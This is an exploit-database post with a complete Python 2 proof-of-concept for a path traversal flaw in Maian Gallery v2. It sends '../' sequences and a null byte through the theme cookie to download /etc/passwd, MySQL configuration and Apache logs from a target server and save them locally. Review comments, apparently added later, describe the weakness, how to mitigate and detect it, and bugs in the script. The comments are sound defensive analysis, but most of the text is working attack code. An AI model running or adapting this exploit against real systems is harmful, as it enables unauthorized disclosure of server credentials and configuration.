[webapps / 0day] - Maian Gallery v2 Local File Download Vuln
Posted on 18 September 2010
==================================================
Maian Gallery v2 Local File Download Vulnerability
==================================================

#!/usr/bin/python
#
# This vulnerability uses file_get_contents()
# so we have some limitations, we cant execute PHP
# and we cant read files that the web server will
# interpret such as PHP, conf etc
#
# tested on: Ubuntu Linux 2.6.32 with php v5.3.2
# register_globals = Off
#
# PRIVATE 0DAY - code by mr_me
# Vulnerability found by my special PHP friend and is now patched, hence this PoC ;)
#
# mr_me@1337:~$ sudo ~/maian.py -p 127.0.0.1:8080 -t localhost -d /maian_gallery/ -o /home/mr_me/
#
# | ------------------------------------------------------------- |
# | -= Maian Gallery v2 Local File Download Exploit = |
# | ---------------------------[ by mr_me ]---------------------- |
#
# (+) Checking target @: http://localhost/maian_gallery/
#
# (+) Testing Proxy...
# (+) Proxy working! 127.0.0.1:8080
# (+) Building Handler..
# (+) File download is working!
# (+) Looking for remote configuration files and saving them to /home/mr_me/
# (+) Found file on remote host @ /var/log/apache2/access.log
# (+) Found file on remote host @ /etc/mysql/my.cnf
# (+) Found file on remote host @ /etc/passwd
# (!) Done!
#

# Review notes (defensive summary of what this PoC demonstrates):
# - Weakness: the gallery takes the theme name from the 'mgallery_theme_cookie'
#   cookie and concatenates it into a filesystem path that is passed to
#   file_get_contents() without canonicalisation or an allowlist check
#   (path traversal / arbitrary file read, CWE-22 class). The request below
#   prepends '../' segments and appends a '%00' byte so that whatever suffix
#   the application adds is cut off; null-byte truncation depends on the PHP
#   build of that era (the header says php 5.3.2) — current PHP rejects
#   filesystem paths containing a null byte.
# - Impact is read-only disclosure of files the web server user can open;
#   PHP sources are executed rather than returned, as the author's header notes.
# - Mitigation: resolve the cookie value through a fixed allowlist of theme
#   names (or at minimum basename() it, reject "\0" and "..", and verify that
#   realpath() stays inside the themes directory); never build paths from
#   cookie contents.
# - Detection: '../' or '%00' sequences inside a Cookie header, and the fixed
#   PHPSESSID value hard-coded below, are straightforward log/WAF signatures.
# - This is Python 2 code (print statements, "except X, e" syntax, httplib,
#   urllib2); it does not run under Python 3.

import sys, os, httplib, socket, urllib2, re
from optparse import OptionParser

# Command-line parsing happens at import time, so every later reference to
# `options` is a module global.
usage= "./%prog [<options>] -t [target] -d [directory] -o [output dir to save files]"
usage += " Example : ./%prog -p 203.167.876.54:80 -t localhost -d maian_gallery/"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy", help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target", help="The target server")
parser.add_option("-d", type="string", action="store", dest="directory", help="The dir path to maian gallery")
parser.add_option("-o", type="string", action="store", dest="outputDir", help="Output dir to save all files")
(options, args) = parser.parse_args()

def banner():
    """Print the tool banner to stdout."""
    print " | ------------------------------------------------------------ |"
    print " | -= Maian Gallery v2 Local File Download Exploit =- |"
    print " | ---------------------------[ by mr_me ]--------------------- | "

# Fewer than four argv entries cannot carry the required -t/-d pairs, so
# show the usage text and exit.  Note that -t, -d and -o are never checked
# for None individually; a missing -o surfaces later as a TypeError in open().
if len(sys.argv) < 4:
    banner()
    parser.print_help()
    sys.exit(1)

def getProxy():
    """Open a test connection to the configured proxy and return a urllib2 ProxyHandler for it.

    Exits the process on socket.timeout.  The HTTPConnection `pr` is never
    closed.  `except ():` matches no exception type at all, so the
    "Proxy Failed" branch is unreachable and e.g. socket.error propagates
    as an ordinary traceback instead.
    """
    try:
        pr = httplib.HTTPConnection(options.proxy)
        pr.connect()
        proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
    except(socket.timeout):
        print " (-) Proxy Timed Out"
        sys.exit(1)
    except(),msg:
        print " (-) Proxy Failed"
        sys.exit(1)
    return proxy_handler

# Probe file requested first; the response body is then searched for the
# 'root:x:' marker to decide whether the traversal actually works.
dltest = "etc/passwd"
# Traversal prefix placed in front of every requested path.
dotDotSlash = '../../../../../../../../../'
# Files fetched once the probe succeeds; each is written under outputDir
# as <basename>.txt.  Two log paths are tried because the Apache access-log
# name differs between distributions.
findAllFiles = ['/var/log/apache2/access_log', '/var/log/apache2/access.log', '/etc/mysql/my.cnf', '/etc/my.cnf', '/etc/passwd', '/etc/apache2/httpd.conf']

# NOTE(review): options.target[0:6] is six characters long while 'http://'
# is seven, so this comparison is always true and the scheme is prepended
# even when the user already supplied one.
if options.target[0:6] != 'http://':
    options.target = "http://" + options.target

def getRequest(localFile):
    """Fetch the gallery page with a crafted theme cookie and return the response body.

    localFile is the path (without leading slash semantics enforced) that is
    appended to the traversal prefix.  HTTP error responses are read and
    returned just like successful ones rather than raised.  When a proxy is
    configured, a fresh opener is built — and the proxy re-tested via
    getProxy() — on every call.  The PHPSESSID value is a fixed constant.
    """
    if options.proxy:
        try:
            proxyfier = urllib2.build_opener(getProxy())
            proxyfier.addheaders = [('Cookie', 'PHPSESSID=d0tcacup9euftbsb9kd7r55db3; mgallery_theme_cookie='+dotDotSlash+localFile+"%00")]
            check = proxyfier.open(options.target+options.directory).read()
        except urllib2.HTTPError, error:
            check = error.read()
    else:
        try:
            req = urllib2.Request(options.target+options.directory)
            req.add_header('Cookie', 'PHPSESSID=d0tcacup9euftbsb9kd7r55db3; mgallery_theme_cookie='+dotDotSlash+localFile+"%00")
            check = urllib2.urlopen(req).read()
        except urllib2.HTTPError, error:
            check = error.read()
    return check

banner()
print "(+) Checking target @: %s" % (options.target+options.directory)
# These messages are printed before any request is made; the proxy is only
# exercised inside getRequest() -> getProxy().
if options.proxy:
    print " (+) Testing Proxy..."
    print "(+) Proxy working! %s" % (options.proxy)
    print "(+) Building Handler.."
check = getRequest(dltest)
# Heuristic: a response containing 'root:x:' is taken as proof that the
# probe file was returned.
if re.findall("root:x:", check):
    print "(+) File download is working!"
    print "(+) Looking for remote configuration files and saving them to %s" % (options.outputDir)
    for f in findAllFiles:
        checkFile = getRequest(f)
        # An empty body is treated as "file not present"; any non-empty
        # body (including an HTML error page) counts as a hit.
        if len(checkFile) > 0:
            print "(+) Found file on remote host @ %s" % (f)
            filenames = f.split('/')
            # outputDir is used as a raw string prefix (no os.path.join),
            # so it must end with a path separator.  The bare except hides
            # the real I/O error behind a generic message.
            try:
                ff = open(options.outputDir+filenames[len(filenames)-1]+'.txt','w')
                ff.write(checkFile)
                ff.close()
            except:
                print "(-) Cannot save remote files locally.. check your path"
    print "(!) Done! "
else:
    print "(-) Target not vulnerable to the file download vulnerability"

# Inj3ct0r.com [2010-09-18]